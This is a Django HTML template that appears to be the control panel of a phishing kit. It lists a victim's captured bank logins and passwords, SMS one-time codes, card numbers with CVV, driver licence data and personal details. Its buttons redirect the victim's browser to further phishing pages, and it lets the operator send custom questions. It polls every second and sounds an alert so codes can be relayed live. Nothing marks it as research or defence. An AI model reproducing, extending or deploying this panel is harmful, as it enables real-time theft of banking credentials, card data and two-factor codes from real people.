{% load static %}
<!doctype html>
<html lang="en">
<head>
    <link rel="shortcut icon" href="{% static 'favicon.ico' %}" type="image/x-icon">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>{{ client.pk }} {% if client.is_waiting %}WAITING
    {% elif not client.is_online %}OFFLINE
    {% else %}CHILLING{% endif %}</title>


    <!-- Bootstrap core CSS -->
    <link href="{% static 'css/bootstrap.css' %}" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="../static/css/main.css" rel="stylesheet">
    <script
            src="https://code.jquery.com/jquery-3.5.1.js"
            integrity="sha256-QWo7LDvxbWT2tbbQ97B53yJnYU3WhH/C8ycbRAkjPDc="
            crossorigin="anonymous"></script>
    <script src="{% static 'bootstrap.min.js' %}"></script>

    <script type="text/javascript">
        function call_request(elem) {
            var data = 'client=' + elem.getAttribute("data-client") + '&page=' + elem.getAttribute("data-page")
            send_request(data)
        }

        function send_request(data_to_send) {
            $.ajax({
                type: 'POST',
                async: true,
                url: '/set_redirect/',
                data: data_to_send,
                success: function (data) {
                    window.location.reload()
                },
                dataType: 'json',
            });
        }
    </script>
    <style>
        .blink_me {
            animation: blinker 1.2s linear infinite;
        }

        @keyframes blinker {
            50% {
                opacity: 0;
            }
        }
    </style>
</head>
<body>
<div class="container" style="margin-top: 50px">
    <div class="row">
        <div class="col-12">
            <h5 style="margin-bottom: 20px">
                {% if client.is_online %}
                    <span style="font-size: 10px" class="badge badge-success">on</span>
                    {% if client.is_waiting %}
                        <span style="font-size: 18px" class="badge badge-danger">Waiting</span>
                    {% else %}
                        <span style="font-size: 18px; margin-right: 10px" class="badge badge-primary">Chiling</span>
                    {% endif %}
                    <span onclick="window.location.href = document.location.href.replace('?sms=true', '')"
                          style="cursor:pointer;font-size: 18px; margin-right: 10px; display: none"
                          class="badge badge-dark blink_me">SMS</span>
                {% else %}
                    <span style="font-size: 10px" class="badge badge-danger">off</span>
                {% endif %}
                ID: {{ client.pk }}
                <small style="margin-left: 10px; font-weight: bold"> Last
                    seen: {{ client.last_action|date:'H:i d/m' }}</small>
                <small style="margin-left: 10px; font-weight: bold"> Last redirect: {{ client.last_redirect }}</small>
                <small style="margin-left: 10px; font-weight: bold"> Request from: {{ client.request_from }}</small>
                <small style="margin-left: 10px; font-weight: bold"> IP: {{ client.ip }}</small>
                <a href="/client_export/{{ client.id }}" style="font-size: 14px" class="badge badge-info">export</a>
            </h5>
        </div>
        <div class="col-6">
            <div class="btn-group" role="group">
                <button onclick="call_request(this)" data-client="{{ client.uuid }}" data-page="profile" type="button"
                        class="btn btn-outline-primary" {{ disabled }}>Profile
                </button>
                <button onclick="call_request(this)" data-client="{{ client.uuid }}" data-page="sms" type="button"
                        class="btn btn-outline-primary"  {{ disabled }}>SMS
                </button>
                <button onclick="call_request(this)" data-client="{{ client.uuid }}" data-page="card" type="button"
                        class="btn btn-outline-primary"  {{ disabled }}>Card
                </button>
                <button onclick="call_request(this)" data-client="{{ client.uuid }}" data-page="driver" type="button"
                        class="btn btn-outline-primary"  {{ disabled }}>Driver
                </button>
                <button onclick="call_request(this)" data-client="{{ client.uuid }}" data-page="complete" type="button"
                        class="btn btn-outline-primary"  {{ disabled }}>Complete
                </button>
                <button onclick="call_request(this)" data-client="{{ client.uuid }}" data-page="error" type="button"
                        class="btn btn-danger" {{ disabled }}>Error
                </button>
                <button onclick="call_request(this)" data-client="{{ client.uuid }}" data-page="bank" type="button"
                        class="btn btn-warning"  {{ disabled }}>Bank
                </button>
            </div>
        </div>
        <div class="col-6">
            <div class="input-group">
                <div class="input-group-prepend">
                    <span class="input-group-text" id="basic-addon1">?</span>
                </div>
                <input id="question" type="text" class="form-control" placeholder="question">
            </div>
        </div>
    </div>

    <div class="row" style="margin-top: 30px">
        <div class="col">
            <div class="card">
                <div class="card-header">
                    Logins
                </div>
                <div class="card-body">
                    {% for login in client.logins %}
                        <small class="card-text">Time: {{ login.created_at }}</small>
                        <p class="card-text">Client ID: {{ login.bank_id }} | Password: {{ login.password }}</p>
                        <hr>
                    {% endfor %}
                </div>
            </div>
        </div>
        <div class="col">
            <div class="card">
                <div class="card-header">
                    SMS
                </div>
                <div class="card-body">
                    {% for sms in client.sms %}
                        <small class="card-text">Time: {{ sms.created_at }}</small>
                        <p class="card-text">Code: {{ sms.code }}</p>
                        <hr>
                    {% endfor %}
                </div>
            </div>
        </div>
        <div class="col">
            <div class="card">
                <div class="card-header">
                    Driver licenses
                </div>
                <div class="card-body">
                    {% for driver in client.drivers %}
                        <small class="card-text">Time: {{ driver.created_at }}</small>
                        <p class="card-text">Full name: {{ driver.full_name }}</p>
                        <p class="card-text">License number: {{ driver.license }}</p>
                        <p class="card-text">EXP: {{ driver.exp }}</p>
                        <hr>
                    {% endfor %}
                </div>
            </div>
        </div>
    </div>
    <br>
    <div class="row">
        <div class="col">
            <div class="card">
                <div class="card-header">
                    Cards
                </div>
                <div class="card-body">
                    {% for card in client.cards %}
                        <small class="card-text">Time: {{ card.created_at }}</small>
                        <p class="card-text">{{ card.card }} | {{ card.card_date }} | {{ card.cvv }}</p>
                        <hr>
                    {% endfor %}
                </div>
            </div>
        </div>
        <div class="col">
            <div class="card">
                <div class="card-header">
                    Profiles
                </div>
                <div class="card-body">
                    {% for profile in client.profiles %}
                        <p class="card-text">Name: {{ profile.first_name }} {{ profile.last_name }}</p>
                        <p class="card-text">Mobile number: {{ profile.mobile_number }}</p>
                        <p class="card-text">Date of birth: {{ profile.birth_date }}</p>
                        <hr>
                    {% endfor %}

                </div>
            </div>
        </div>
        <div class="col">
            <div class="card">
                <div class="card-header">
                    Questions
                </div>
                <div class="card-body">
                    {% for question in client.questions %}
                        <small class="card-text">Question: {{ question.question }}</small>
                        <p class="card-text">Answer: {% if question.answer %}{{ question.answer }}
                        {% else %}
                            --------------
                        {% endif %}</p>
                        <hr>
                    {% endfor %}

                </div>
            </div>
        </div>
    </div>
</div>
<audio id="notify" src="{% static 'alert.mp3' %}" preload="auto"></audio>
</body>
<script type="text/javascript">
    $(document).ready(function () {
        if (window.location.href.indexOf("sms=true") >= 0) {
            $(".blink_me").show()
            document.title = {{ client.id }} +' SMS WAIT'
        }

        $("#question").keyup(function (event) {
            if (event.keyCode == 13) {
                event.preventDefault();
                let question = $('#question').val()
                $.ajax({
                    type: 'POST',
                    async: true,
                    url: '/set_question/',
                    data: '?question=' + question + '&client_id=' + {{ client.id }},
                    success: function (data) {
                        window.location.reload()
                    },
                    dataType: 'json',
                });
            }
        });

        var user_previous_waiting =
        {{ client.is_waiting|stringformat:"i" }}
        var user_previous_status =
        {{ client.is_online|stringformat:"i" }}
        var user_previous_sms_status = {{ client.is_sms_alert|stringformat:"i" }}
            function play_sound() {
                return $("#notify")[0].play()
            }
        if (user_previous_waiting === 1) {
            setInterval(play_sound, 500)
        }

        function get_updates() {
            $.ajax({
                type: 'GET',
                async: true,
                url: '/client/{{ client.pk }}',
                success: function (data) {
                    if (data['is_wait_sms'] !== user_previous_sms_status && window.location.href.indexOf("sms=true") < 0) {
                        window.location.href = window.location.href + '?sms=true'
                    } else if (data['current_waiting'] !== user_previous_waiting || data["current_status"] !== user_previous_status) {
                        window.location.reload()
                    }
                },
                dataType: 'json',
            });
        }

        setInterval(get_updates, 1000)
    });
</script>
</html>
